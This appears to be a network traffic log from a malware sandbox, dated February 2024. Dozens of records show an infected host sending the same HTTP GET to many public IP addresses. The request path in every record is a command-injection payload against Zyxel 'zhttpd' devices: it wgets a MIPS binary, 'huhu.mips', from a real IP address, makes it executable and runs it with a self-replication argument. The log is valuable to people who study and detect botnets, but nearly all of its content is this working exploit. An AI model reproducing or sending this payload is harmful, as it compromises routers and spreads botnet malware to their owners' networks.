                                                      Feb 2, 2024 06:36:12.052417994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9129192.168.2.1453034110.127.73.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052476883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9130192.168.2.1453298210.202.27.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052503109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9131192.168.2.1436696218.229.184.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052558899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9132192.168.2.144378680.38.253.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052597046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9133192.168.2.144631486.33.208.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052637100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9134192.168.2.1450586182.166.173.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052687883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9135192.168.2.1433602144.222.80.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052711964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9136192.168.2.143695834.149.163.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052747965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9137192.168.2.1444512159.2.42.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052786112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9138192.168.2.1455466118.51.13.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052819014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9139192.168.2.143658448.129.198.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052850962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9140192.168.2.1460148193.178.165.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052900076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9141192.168.2.1460844157.130.182.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052952051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9142192.168.2.1460100152.140.195.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052972078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9143192.168.2.144907213.57.212.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053021908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9144192.168.2.145841899.172.91.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053127050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9145192.168.2.144693863.170.224.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053143978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9146192.168.2.1455400141.236.171.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053190947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9147192.168.2.144838486.177.107.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053231955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9148192.168.2.145172280.31.67.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053267956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9149192.168.2.1452068103.113.198.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053303003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9150192.168.2.1436196138.211.17.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053332090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9151192.168.2.143685849.171.190.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053394079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9152192.168.2.1436172123.162.165.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053435087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9153192.168.2.1450448118.26.84.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053481102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9154192.168.2.1442340124.230.107.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053514004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9155192.168.2.1447470128.168.62.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053541899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9156192.168.2.143442448.210.196.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053570032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9157192.168.2.1441896176.30.174.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053620100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9158192.168.2.1453522209.86.172.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053658009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9159192.168.2.143322842.106.76.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053683043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9160192.168.2.144221034.85.49.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053715944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9161192.168.2.1448432166.24.160.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053771019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9162192.168.2.1459302189.96.153.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053800106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9163192.168.2.1454632217.19.89.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053854942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9164192.168.2.1433500178.11.195.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053893089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9165192.168.2.1444780120.39.124.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053941965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9166192.168.2.1459278168.249.169.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.053989887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9167192.168.2.1454810208.5.66.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054014921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9168192.168.2.143642897.190.115.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054044008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9169192.168.2.1434248104.249.252.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054088116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9170192.168.2.1455628117.216.249.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054135084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9171192.168.2.1460398128.238.4.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054181099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9172192.168.2.144515477.149.201.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054219007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9173192.168.2.1441448147.39.87.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054289103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9174192.168.2.144824293.131.123.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054317951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9175192.168.2.1451856170.137.66.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054362059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9176192.168.2.1442536118.48.225.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054395914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9177192.168.2.145608232.190.84.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054430008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9178192.168.2.1436008103.252.144.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054471016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9179192.168.2.143318447.188.119.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054513931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9180192.168.2.1436888155.221.211.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054542065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9181192.168.2.1450364210.235.219.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054593086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9182192.168.2.1445264104.159.58.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054625988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9183192.168.2.1436912153.101.205.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054651976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9184192.168.2.143962625.178.227.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054697037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9185192.168.2.1442678171.162.209.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054769039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9186192.168.2.1440918107.149.69.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054809093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9187192.168.2.1449908111.119.22.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054838896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9188192.168.2.145030883.208.74.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054888964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9189192.168.2.1439510104.125.244.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054913044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9190192.168.2.1445154203.139.22.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.054964066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9191192.168.2.144659286.19.230.138443
                                                      TimestampBytes transferredDirectionData
